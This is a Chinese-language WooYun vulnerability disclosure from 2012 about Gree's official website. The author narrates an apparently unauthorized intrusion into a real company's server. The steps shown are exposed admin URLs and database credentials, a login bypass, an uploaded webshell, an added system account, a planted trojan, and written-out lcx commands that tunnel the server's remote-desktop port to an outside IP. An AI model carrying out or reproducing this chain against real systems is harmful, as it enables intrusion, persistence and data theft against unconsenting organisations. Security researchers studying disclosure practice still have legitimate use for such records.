当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-09837

漏洞标题:友情检测格力官方网站

相关厂商:格力官方

漏洞作者: Aepl│恋爱

提交时间:2012-07-18 15:59

修复时间:2012-09-01 16:00

公开时间:2012-09-01 16:00

漏洞类型:重要敏感信息泄露

危害等级:中

自评Rank:8

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-07-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-09-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

程序目录爆出数据库敏感帐密信息 通过得到的信息进入数据库管理 最后提权服务器最高权限进入服务器

详细说明:

今天在群里无意中看到有人说格力的官方网站是否能日。。
闲着没事就去看了下格力的网站 后来的结果自然是理想的 ☺
直接上神器 扫后台敏感目录先





直接爆出后台地址
http://www.gree.com/admin/config/main.jsp
http://www.gree.com/admin/config
后台地址两枚
又看到爆出敏感目录的后台帐号密码信息
http://www.gree.com/admin/db.jsp


用得到的帐号密码登录 http://www.gree.com/admin/config/main.jsp


接着打开http://www.gree.com/admin/main.jsp 需要帐密登录 但是没有获取到有效的登录帐密 然后得以UP大牛的方法提醒利用浏览器自身入侵的方法
首先打开用得到的帐号密码登录 http://www.gree.com/admin/config/main.jsp 用帐号密码登录 然后再打开http://www.gree.com/admin/main.jsp 到后台登录界面 因为此后台禁止鼠标右键 所以果断快捷键 Ctrl+F5 刷新后台 这时你会惊喜的发现 后台竟然进入了


此后又找到上传 果断传了个shell上去



看着有system权限,就直接添加了个账户netuser--icesword


加完账号,发现内网服务器啊,我靠,多麻烦。
不过tasklist看了下进程,发现也没杀软,干脆先种个马再说。
D:\~~~\> start C:\wmpub\ice.exe


话说我对端口转发还是比较恐惧的,我的2M宽带太蛋疼了。其实,我种马是为了更方便的端口转发。
接着,看看远程端口:
D:\~~~\> REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
端口号 -- > 0x19c8 == 6060 (0x1908是6060的十六进制数)


额,现在开始端口转发:
本机cmd:
#> C:\lcx.exe -listen 2222 3333
/*注释:2222 --转发端口; 3333--连接端口 */

肉鸡服务器cmd:
#> C:\wmpub\lcx.exe -slave 110.88.55.78 2222 127.0.0.1 6060
/*注释: 110.88.55.78是本机IP;6060是服务器远程桌面端口*/



两边的cmd命令行分别敲下Enter键,mstsc连接 127.0.0.1:3333。(可以观察到两边的窗口中,持续的在收发数据包)

漏洞证明:


修复方案:

删除敏感目录信息 修改登录地址 修改掉system权限等

版权声明:转载请注明来源 Aepl│恋爱@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:18 (WooYun评价)